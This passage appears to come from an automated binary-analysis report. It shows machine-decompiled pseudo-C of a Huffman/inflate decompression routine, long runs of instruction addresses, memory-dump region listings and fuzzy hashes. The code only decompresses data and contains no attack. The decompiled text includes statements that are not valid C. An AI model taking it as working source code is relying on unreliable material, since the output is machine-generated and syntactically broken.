                                                                                    													break;
                                                                                    												}
                                                                                    												L73:
                                                                                    												__eax = __esi[0x143];
                                                                                    												while(1) {
                                                                                    													L76:
                                                                                    													__eflags = __ebx - __eax;
                                                                                    													if(__ebx >= __eax) {
                                                                                    														break;
                                                                                    													}
                                                                                    													L74:
                                                                                    													__eflags =  *(__ebp - 0x34);
                                                                                    													if( *(__ebp - 0x34) == 0) {
                                                                                    														goto L182;
                                                                                    													}
                                                                                    													L75:
                                                                                    													__ecx =  *(__ebp - 0x38);
                                                                                    													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    													__ecx = __ebx;
                                                                                    													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    													__ebx = __ebx + 8;
                                                                                    													__eflags = __ebx;
                                                                                    												}
                                                                                    												L77:
                                                                                    												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                                                    												__eax = __eax &  *(__ebp - 0x40);
                                                                                    												__ecx = __esi[0x144];
                                                                                    												__eax = __esi[0x144] + __eax * 4;
                                                                                    												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                    												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                    												__eflags = __eax - 0x10;
                                                                                    												 *(__ebp - 0x14) = __eax;
                                                                                    												if(__eax >= 0x10) {
                                                                                    													L79:
                                                                                    													__eflags = __eax - 0x12;
                                                                                    													if(__eax != 0x12) {
                                                                                    														__eax = __eax + 0xfffffff2;
                                                                                    														 *(__ebp - 8) = 3;
                                                                                    													} else {
                                                                                    														_push(7);
                                                                                    														 *(__ebp - 8) = 0xb;
                                                                                    														_pop(__eax);
                                                                                    													}
                                                                                    													while(1) {
                                                                                    														L84:
                                                                                    														__ecx = __eax + __edx;
                                                                                    														__eflags = __ebx - __eax + __edx;
                                                                                    														if(__ebx >= __eax + __edx) {
                                                                                    															break;
                                                                                    														}
                                                                                    														L82:
                                                                                    														__eflags =  *(__ebp - 0x34);
                                                                                    														if( *(__ebp - 0x34) == 0) {
                                                                                    															goto L182;
                                                                                    														}
                                                                                    														L83:
                                                                                    														__ecx =  *(__ebp - 0x38);
                                                                                    														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    														__ecx = __ebx;
                                                                                    														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    														__ebx = __ebx + 8;
                                                                                    														__eflags = __ebx;
                                                                                    													}
                                                                                    													L85:
                                                                                    													__ecx = __edx;
                                                                                    													__ebx = __ebx - __edx;
                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                    													__edx =  *(__ebp - 8);
                                                                                    													__ebx = __ebx - __eax;
                                                                                    													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                    													__ecx = __eax;
                                                                                    													__eax = __esi[1];
                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    													__ecx = __esi[2];
                                                                                    													__eax = __eax >> 5;
                                                                                    													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                    													__eax = __eax & 0x0000001f;
                                                                                    													__eax = __edi + __eax + 0x102;
                                                                                    													__edi = __edx + __ecx;
                                                                                    													__eflags = __edx + __ecx - __eax;
                                                                                    													if(__edx + __ecx > __eax) {
                                                                                    														goto L9;
                                                                                    													}
                                                                                    													L86:
                                                                                    													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                    													if( *(__ebp - 0x14) != 0x10) {
                                                                                    														L89:
                                                                                    														__edi = 0;
                                                                                    														__eflags = 0;
                                                                                    														L90:
                                                                                    														__eax = __esi + 0xc + __ecx * 4;
                                                                                    														do {
                                                                                    															L91:
                                                                                    															 *__eax = __edi;
                                                                                    															__ecx = __ecx + 1;
                                                                                    															__eax = __eax + 4;
                                                                                    															__edx = __edx - 1;
                                                                                    															__eflags = __edx;
                                                                                    														} while (__edx != 0);
                                                                                    														__esi[2] = __ecx;
                                                                                    														continue;
                                                                                    													}
                                                                                    													L87:
                                                                                    													__eflags = __ecx - 1;
                                                                                    													if(__ecx < 1) {
                                                                                    														goto L9;
                                                                                    													}
                                                                                    													L88:
                                                                                    													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                    													goto L90;
                                                                                    												}
                                                                                    												L78:
                                                                                    												__ecx = __edx;
                                                                                    												__ebx = __ebx - __edx;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    												__ecx = __esi[2];
                                                                                    												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                    												__esi[2] = __esi[2] + 1;
                                                                                    											}
                                                                                    											L94:
                                                                                    											__eax = __esi[1];
                                                                                    											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                    											__edi = __eax;
                                                                                    											__eax = __eax >> 5;
                                                                                    											__edi = __edi & 0x0000001f;
                                                                                    											__ecx = 0x101;
                                                                                    											__eax = __eax & 0x0000001f;
                                                                                    											__edi = __edi + 0x101;
                                                                                    											__eax = __eax + 1;
                                                                                    											__edx = __ebp - 0xc;
                                                                                    											 *(__ebp - 0x14) = __eax;
                                                                                    											 &(__esi[0x148]) = __ebp - 4;
                                                                                    											 *(__ebp - 4) = 9;
                                                                                    											__ebp - 0x18 =  &(__esi[3]);
                                                                                    											 *(__ebp - 0x10) = 6;
                                                                                    											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                    											__eflags =  *(__ebp - 4);
                                                                                    											if( *(__ebp - 4) == 0) {
                                                                                    												__eax = __eax | 0xffffffff;
                                                                                    												__eflags = __eax;
                                                                                    											}
                                                                                    											__eflags = __eax;
                                                                                    											if(__eax != 0) {
                                                                                    												goto L9;
                                                                                    											} else {
                                                                                    												L97:
                                                                                    												__ebp - 0xc =  &(__esi[0x148]);
                                                                                    												__ebp - 0x10 = __ebp - 0x1c;
                                                                                    												__eax = __esi + 0xc + __edi * 4;
                                                                                    												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                    												__eflags = __eax;
                                                                                    												if(__eax != 0) {
                                                                                    													goto L9;
                                                                                    												}
                                                                                    												L98:
                                                                                    												__eax =  *(__ebp - 0x10);
                                                                                    												__eflags =  *(__ebp - 0x10);
                                                                                    												if( *(__ebp - 0x10) != 0) {
                                                                                    													L100:
                                                                                    													__cl =  *(__ebp - 4);
                                                                                    													 *__esi =  *__esi & 0x00000000;
                                                                                    													__eflags =  *__esi;
                                                                                    													__esi[4] = __al;
                                                                                    													__eax =  *(__ebp - 0x18);
                                                                                    													__esi[5] =  *(__ebp - 0x18);
                                                                                    													__eax =  *(__ebp - 0x1c);
                                                                                    													__esi[4] = __cl;
                                                                                    													__esi[6] =  *(__ebp - 0x1c);
                                                                                    													goto L101;
                                                                                    												}
                                                                                    												L99:
                                                                                    												__eflags = __edi - 0x101;
                                                                                    												if(__edi > 0x101) {
                                                                                    													goto L9;
                                                                                    												}
                                                                                    												goto L100;
                                                                                    											}
                                                                                    										case 0xe:
                                                                                    											goto L9;
                                                                                    										case 0xf:
                                                                                    											L175:
                                                                                    											__eax =  *(__ebp - 0x30);
                                                                                    											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                    											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                                                    											__ecx = __esi[0x26ea];
                                                                                    											__edx = __esi[0x26e9];
                                                                                    											__eflags = __ecx - __edx;
                                                                                    											 *(__ebp - 0x30) = __ecx;
                                                                                    											if(__ecx >= __edx) {
                                                                                    												__eax = __esi[0x26e8];
                                                                                    												__eax = __esi[0x26e8] - __ecx;
                                                                                    												__eflags = __eax;
                                                                                    											} else {
                                                                                    												__edx = __edx - __ecx;
                                                                                    												__eax = __edx - __ecx - 1;
                                                                                    											}
                                                                                    											__eflags = __ecx - __edx;
                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                    											if(__ecx != __edx) {
                                                                                    												L183:
                                                                                    												__edi = 0;
                                                                                    												goto L10;
                                                                                    											} else {
                                                                                    												L179:
                                                                                    												__eax = __esi[0x145];
                                                                                    												__eflags = __eax - 8;
                                                                                    												 *__esi = __eax;
                                                                                    												if(__eax != 8) {
                                                                                    													L184:
                                                                                    													0 = 1;
                                                                                    													goto L10;
                                                                                    												}
                                                                                    												goto L180;
                                                                                    											}
                                                                                    									}
                                                                                    								}
                                                                                    								L181:
                                                                                    								goto L9;
                                                                                    							}
                                                                                    							L70:
                                                                                    							if( *__edi == __eax) {
                                                                                    								goto L72;
                                                                                    							}
                                                                                    							L71:
                                                                                    							__esi[2] = __esi[2] & __eax;
                                                                                    							 *__esi = 0xd;
                                                                                    							goto L93;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				L182:
                                                                                    				_t443 = 0;
                                                                                    				_t446[0x147] =  *(_t448 - 0x40);
                                                                                    				_t446[0x146] = _t425;
                                                                                    				( *(_t448 + 8))[1] = 0;
                                                                                    				goto L11;
                                                                                    			}









                                                                                    0x00406d3f
                                                                                    0x00406d41
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d1f
                                                                                    0x00406d1f
                                                                                    0x00406d23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d34
                                                                                    0x00406d36
                                                                                    0x00406d39
                                                                                    0x00406d3c
                                                                                    0x00406d3c
                                                                                    0x00406d3c
                                                                                    0x00406d43
                                                                                    0x00406d4b
                                                                                    0x00406d4e
                                                                                    0x00406d51
                                                                                    0x00406d53
                                                                                    0x00406d56
                                                                                    0x00406d56
                                                                                    0x00406d58
                                                                                    0x00406d5c
                                                                                    0x00406d5f
                                                                                    0x00406d62
                                                                                    0x00406d65
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d6b
                                                                                    0x00406d6b
                                                                                    0x00406d90
                                                                                    0x00406d90
                                                                                    0x00406d90
                                                                                    0x00406d92
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d70
                                                                                    0x00406d70
                                                                                    0x00406d74
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d7a
                                                                                    0x00406d7a
                                                                                    0x00406d7d
                                                                                    0x00406d80
                                                                                    0x00406d83
                                                                                    0x00406d85
                                                                                    0x00406d87
                                                                                    0x00406d8a
                                                                                    0x00406d8d
                                                                                    0x00406d8d
                                                                                    0x00406d8d
                                                                                    0x00406d94
                                                                                    0x00406d94
                                                                                    0x00406d9c
                                                                                    0x00406d9f
                                                                                    0x00406da2
                                                                                    0x00406da5
                                                                                    0x00406da9
                                                                                    0x00406dac
                                                                                    0x00406dae
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406dce
                                                                                    0x00406dce
                                                                                    0x00406dd1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406dd7
                                                                                    0x00406dd7
                                                                                    0x00406dda
                                                                                    0x00406de1
                                                                                    0x00000000
                                                                                    0x00406de1
                                                                                    0x00406db6
                                                                                    0x00406db9
                                                                                    0x00406dc0
                                                                                    0x00406dc3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406de9
                                                                                    0x00406de9
                                                                                    0x00406e0e
                                                                                    0x00406e0e
                                                                                    0x00406e0e
                                                                                    0x00406e10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406dee
                                                                                    0x00406dee
                                                                                    0x00406df2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfb
                                                                                    0x00406dfe
                                                                                    0x00406e01
                                                                                    0x00406e03
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0b
                                                                                    0x00406e0b
                                                                                    0x00406e0b
                                                                                    0x00406e12
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e22
                                                                                    0x00406e25
                                                                                    0x00406e25
                                                                                    0x00406e27
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e2d
                                                                                    0x00406e2d
                                                                                    0x00406e30
                                                                                    0x00406e35
                                                                                    0x00406e37
                                                                                    0x00406e3d
                                                                                    0x00406e3f
                                                                                    0x00406e54
                                                                                    0x00406e56
                                                                                    0x00406e56
                                                                                    0x00406e41
                                                                                    0x00406e47
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e4b
                                                                                    0x00406e58
                                                                                    0x00406e5c
                                                                                    0x00406e5f
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e68
                                                                                    0x00406e68
                                                                                    0x00406e68
                                                                                    0x00406e6a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e70
                                                                                    0x00406e70
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e9d
                                                                                    0x00406ea0
                                                                                    0x00406ea6
                                                                                    0x00406eab
                                                                                    0x00406eb1
                                                                                    0x00406eb7
                                                                                    0x00406eb9
                                                                                    0x00406ebc
                                                                                    0x00406ec5
                                                                                    0x00406ecb
                                                                                    0x00406ecb
                                                                                    0x00406ebe
                                                                                    0x00406ec0
                                                                                    0x00406ec2
                                                                                    0x00406ec2
                                                                                    0x00406ecd
                                                                                    0x00406ed3
                                                                                    0x00406ed5
                                                                                    0x00406ed8
                                                                                    0x00406eda
                                                                                    0x00406ee0
                                                                                    0x00406ee2
                                                                                    0x00406ee4
                                                                                    0x00406ee6
                                                                                    0x00406ee8
                                                                                    0x00406eeb
                                                                                    0x00406ef4
                                                                                    0x00406ef7
                                                                                    0x00406ef7
                                                                                    0x00406eed
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef0
                                                                                    0x00406eeb
                                                                                    0x00406ee2
                                                                                    0x00406ef9
                                                                                    0x00406efb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406efb
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e80
                                                                                    0x00406e86
                                                                                    0x00406e88
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e8a
                                                                                    0x00406e8a
                                                                                    0x00406e8c
                                                                                    0x00406e8e
                                                                                    0x00406e97
                                                                                    0x00406e97
                                                                                    0x00406e90
                                                                                    0x00406e90
                                                                                    0x00406e93
                                                                                    0x00406e93
                                                                                    0x00406e99
                                                                                    0x00406e9b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f01
                                                                                    0x00406f01
                                                                                    0x00406f06
                                                                                    0x00406f08
                                                                                    0x00406f09
                                                                                    0x00406f0a
                                                                                    0x00406f0b
                                                                                    0x00406f11
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1c
                                                                                    0x00406f22
                                                                                    0x00406f22
                                                                                    0x00406f25
                                                                                    0x00406f25
                                                                                    0x00406f25
                                                                                    0x00406f25
                                                                                    0x00406f2e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f33
                                                                                    0x00406f33
                                                                                    0x00406f36
                                                                                    0x00406f39
                                                                                    0x00406f3b
                                                                                    0x00406fd2
                                                                                    0x00406fd2
                                                                                    0x00406fd5
                                                                                    0x00406fd7
                                                                                    0x00406fd8
                                                                                    0x00406fd9
                                                                                    0x00406fdc
                                                                                    0x00000000
                                                                                    0x00406fdc
                                                                                    0x00406f41
                                                                                    0x00406f41
                                                                                    0x00406f47
                                                                                    0x00406f49
                                                                                    0x00406f6e
                                                                                    0x00406f71
                                                                                    0x00406f77
                                                                                    0x00406f7c
                                                                                    0x00406f82
                                                                                    0x00406f88
                                                                                    0x00406f8a
                                                                                    0x00406f8d
                                                                                    0x00406f96
                                                                                    0x00406f9c
                                                                                    0x00406f9c
                                                                                    0x00406f8f
                                                                                    0x00406f91
                                                                                    0x00406f93
                                                                                    0x00406f93
                                                                                    0x00406f9e
                                                                                    0x00406fa4
                                                                                    0x00406fa6
                                                                                    0x00406fa9
                                                                                    0x00406fab
                                                                                    0x00406fb1
                                                                                    0x00406fb3
                                                                                    0x00406fb5
                                                                                    0x00406fb7
                                                                                    0x00406fb9
                                                                                    0x00406fbc
                                                                                    0x00406fc5
                                                                                    0x00406fc8
                                                                                    0x00406fc8
                                                                                    0x00406fbe
                                                                                    0x00406fbe
                                                                                    0x00406fc1
                                                                                    0x00406fc1
                                                                                    0x00406fbc
                                                                                    0x00406fb3
                                                                                    0x00406fca
                                                                                    0x00406fcc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406b45
                                                                                    0x00406b48
                                                                                    0x00406b4b
                                                                                    0x00406b4e
                                                                                    0x00406b55
                                                                                    0x00406b58
                                                                                    0x00406b5a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406b60
                                                                                    0x00406b60
                                                                                    0x00406b64
                                                                                    0x00406b75
                                                                                    0x00406b75
                                                                                    0x00406b75
                                                                                    0x00406b77
                                                                                    0x00406b77
                                                                                    0x00406b7b
                                                                                    0x00406b7b
                                                                                    0x00406b7b
                                                                                    0x00406b7d
                                                                                    0x00406b7e
                                                                                    0x00406b81
                                                                                    0x00406b81
                                                                                    0x00406b81
                                                                                    0x00406b84
                                                                                    0x00000000
                                                                                    0x00406b84
                                                                                    0x00406b66
                                                                                    0x00406b66
                                                                                    0x00406b69
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406b6f
                                                                                    0x00406b6f
                                                                                    0x00000000
                                                                                    0x00406b6f
                                                                                    0x00406ac5
                                                                                    0x00406ac5
                                                                                    0x00406ac7
                                                                                    0x00406ac9
                                                                                    0x00406acc
                                                                                    0x00406acf
                                                                                    0x00406ad3
                                                                                    0x00406ad3
                                                                                    0x00406ba7
                                                                                    0x00406ba7
                                                                                    0x00406baa
                                                                                    0x00406bb1
                                                                                    0x00406bb5
                                                                                    0x00406bb7
                                                                                    0x00406bba
                                                                                    0x00406bbd
                                                                                    0x00406bc2
                                                                                    0x00406bc5
                                                                                    0x00406bc7
                                                                                    0x00406bc8
                                                                                    0x00406bcb
                                                                                    0x00406bd6
                                                                                    0x00406bd9
                                                                                    0x00406bf0
                                                                                    0x00406bf5
                                                                                    0x00406bfc
                                                                                    0x00406c01
                                                                                    0x00406c05
                                                                                    0x00406c07
                                                                                    0x00406c07
                                                                                    0x00406c07
                                                                                    0x00406c0a
                                                                                    0x00406c0c
                                                                                    0x00000000
                                                                                    0x00406c12
                                                                                    0x00406c12
                                                                                    0x00406c16
                                                                                    0x00406c21
                                                                                    0x00406c34
                                                                                    0x00406c39
                                                                                    0x00406c3e
                                                                                    0x00406c40
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c46
                                                                                    0x00406c46
                                                                                    0x00406c49
                                                                                    0x00406c4b
                                                                                    0x00406c59
                                                                                    0x00406c59
                                                                                    0x00406c5c
                                                                                    0x00406c5c
                                                                                    0x00406c5f
                                                                                    0x00406c62
                                                                                    0x00406c65
                                                                                    0x00406c68
                                                                                    0x00406c6b
                                                                                    0x00406c6e
                                                                                    0x00000000
                                                                                    0x00406c6e
                                                                                    0x00406c4d
                                                                                    0x00406c4d
                                                                                    0x00406c53
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c53
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ff2
                                                                                    0x00406ff2
                                                                                    0x00406ff8
                                                                                    0x00406ffe
                                                                                    0x00407003
                                                                                    0x00407009
                                                                                    0x0040700f
                                                                                    0x00407011
                                                                                    0x00407014
                                                                                    0x0040701d
                                                                                    0x00407023
                                                                                    0x00407023
                                                                                    0x00407016
                                                                                    0x00407018
                                                                                    0x0040701a
                                                                                    0x0040701a
                                                                                    0x00407025
                                                                                    0x00407027
                                                                                    0x0040702a
                                                                                    0x00407065
                                                                                    0x00407065
                                                                                    0x00000000
                                                                                    0x0040702c
                                                                                    0x0040702c
                                                                                    0x0040702c
                                                                                    0x00407032
                                                                                    0x00407035
                                                                                    0x00407037
                                                                                    0x0040706c
                                                                                    0x0040706e
                                                                                    0x00000000
                                                                                    0x0040706e
                                                                                    0x00000000
                                                                                    0x00407037
                                                                                    0x00000000
                                                                                    0x00406676
                                                                                    0x00407044
                                                                                    0x00000000
                                                                                    0x00407044
                                                                                    0x00406a58
                                                                                    0x00406a5a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406a5c
                                                                                    0x00406a5c
                                                                                    0x00406a5f
                                                                                    0x00000000
                                                                                    0x00406a5f
                                                                                    0x004069a4
                                                                                    0x00406965
                                                                                    0x00407049
                                                                                    0x0040704c
                                                                                    0x0040704e
                                                                                    0x00407057
                                                                                    0x0040705d
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                                    • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                                                    • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                                    • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                    				signed int _v8;
                                                                                    				unsigned int _v12;
                                                                                    				signed int _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				signed int _v24;
                                                                                    				signed int _v28;
                                                                                    				intOrPtr* _v32;
                                                                                    				signed int* _v36;
                                                                                    				signed int _v40;
                                                                                    				signed int _v44;
                                                                                    				intOrPtr _v48;
                                                                                    				intOrPtr _v52;
                                                                                    				void _v116;
                                                                                    				signed int _v176;
                                                                                    				signed int _v180;
                                                                                    				signed int _v240;
                                                                                    				signed int _t166;
                                                                                    				signed int _t168;
                                                                                    				intOrPtr _t175;
                                                                                    				signed int _t181;
                                                                                    				void* _t182;
                                                                                    				intOrPtr _t183;
                                                                                    				signed int* _t184;
                                                                                    				signed int _t186;
                                                                                    				signed int _t187;
                                                                                    				signed int* _t189;
                                                                                    				signed int _t190;
                                                                                    				intOrPtr* _t191;
                                                                                    				intOrPtr _t192;
                                                                                    				signed int _t193;
                                                                                    				signed int _t195;
                                                                                    				signed int _t200;
                                                                                    				signed int _t205;
                                                                                    				void* _t207;
                                                                                    				short _t208;
                                                                                    				signed char _t222;
                                                                                    				signed int _t224;
                                                                                    				signed int _t225;
                                                                                    				signed int* _t232;
                                                                                    				signed int _t233;
                                                                                    				signed int _t234;
                                                                                    				void* _t235;
                                                                                    				signed int _t236;
                                                                                    				signed int _t244;
                                                                                    				signed int _t246;
                                                                                    				signed int _t251;
                                                                                    				signed int _t254;
                                                                                    				signed int _t256;
                                                                                    				signed int _t259;
                                                                                    				signed int _t262;
                                                                                    				void* _t263;
                                                                                    				void* _t264;
                                                                                    				signed int _t267;
                                                                                    				intOrPtr _t269;
                                                                                    				intOrPtr _t271;
                                                                                    				signed int _t274;
                                                                                    				intOrPtr* _t275;
                                                                                    				unsigned int _t276;
                                                                                    				void* _t277;
                                                                                    				signed int _t278;
                                                                                    				intOrPtr* _t279;
                                                                                    				signed int _t281;
                                                                                    				intOrPtr _t282;
                                                                                    				intOrPtr _t283;
                                                                                    				signed int* _t284;
                                                                                    				signed int _t286;
                                                                                    				signed int _t287;
                                                                                    				signed int _t288;
                                                                                    				signed int _t296;
                                                                                    				signed int* _t297;
                                                                                    				intOrPtr _t298;
                                                                                    				void* _t299;
                                                                                    
                                                                                    				_t278 = _a8;
                                                                                    				_t187 = 0x10;
                                                                                    				memset( &_v116, 0, _t187 << 2);
                                                                                    				_t189 = _a4;
                                                                                    				_t233 = _t278;
                                                                                    				do {
                                                                                    					_t166 =  *_t189;
                                                                                    					_t189 =  &(_t189[1]);
                                                                                    					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                    					_t233 = _t233 - 1;
                                                                                    				} while (_t233 != 0);
                                                                                    				if(_v116 != _t278) {
                                                                                    					_t279 = _a28;
                                                                                    					_t267 =  *_t279;
                                                                                    					_t190 = 1;
                                                                                    					_a28 = _t267;
                                                                                    					_t234 = 0xf;
                                                                                    					while(1) {
                                                                                    						_t168 = 0;
                                                                                    						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                    							break;
                                                                                    						}
                                                                                    						_t190 = _t190 + 1;
                                                                                    						if(_t190 <= _t234) {
                                                                                    							continue;
                                                                                    						}
                                                                                    						break;
                                                                                    					}
                                                                                    					_v8 = _t190;
                                                                                    					if(_t267 < _t190) {
                                                                                    						_a28 = _t190;
                                                                                    					}
                                                                                    					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                    						_t234 = _t234 - 1;
                                                                                    						if(_t234 != 0) {
                                                                                    							continue;
                                                                                    						}
                                                                                    						break;
                                                                                    					}
                                                                                    					_v28 = _t234;
                                                                                    					if(_a28 > _t234) {
                                                                                    						_a28 = _t234;
                                                                                    					}
                                                                                    					 *_t279 = _a28;
                                                                                    					_t181 = 1 << _t190;
                                                                                    					while(_t190 < _t234) {
                                                                                    						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                    						if(_t182 < 0) {
                                                                                    							L64:
                                                                                    							return _t168 | 0xffffffff;
                                                                                    						}
                                                                                    						_t190 = _t190 + 1;
                                                                                    						_t181 = _t182 + _t182;
                                                                                    					}
                                                                                    					_t281 = _t234 << 2;
                                                                                    					_t191 = _t299 + _t281 - 0x70;
                                                                                    					_t269 =  *_t191;
                                                                                    					_t183 = _t181 - _t269;
                                                                                    					_v52 = _t183;
                                                                                    					if(_t183 < 0) {
                                                                                    						goto L64;
                                                                                    					}
                                                                                    					_v176 = _t168;
                                                                                    					 *_t191 = _t269 + _t183;
                                                                                    					_t192 = 0;
                                                                                    					_t235 = _t234 - 1;
                                                                                    					if(_t235 == 0) {
                                                                                    						L21:
                                                                                    						_t184 = _a4;
                                                                                    						_t271 = 0;
                                                                                    						do {
                                                                                    							_t193 =  *_t184;
                                                                                    							_t184 =  &(_t184[1]);
                                                                                    							if(_t193 != _t168) {
                                                                                    								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                    								_t236 =  *_t232;
                                                                                    								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
                                                                                    								 *_t232 = _t236 + 1;
                                                                                    							}
                                                                                    							_t271 = _t271 + 1;
                                                                                    						} while (_t271 < _a8);
                                                                                    						_v16 = _v16 | 0xffffffff;
                                                                                    						_v40 = _v40 & 0x00000000;
                                                                                    						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                    						_t195 = _v8;
                                                                                    						_t186 =  ~_a28;
                                                                                    						_v12 = _t168;
                                                                                    						_v180 = _t168;
                                                                                    						_v36 = 0x42d6a8;
                                                                                    						_v240 = _t168;
                                                                                    						if(_t195 > _v28) {
                                                                                    							L62:
                                                                                    							_t168 = 0;
                                                                                    							if(_v52 == 0 || _v28 == 1) {
                                                                                    								return _t168;
                                                                                    							} else {
                                                                                    								goto L64;
                                                                                    							}
                                                                                    						}
                                                                                    						_v44 = _t195 - 1;
                                                                                    						_v32 = _t299 + _t195 * 4 - 0x70;
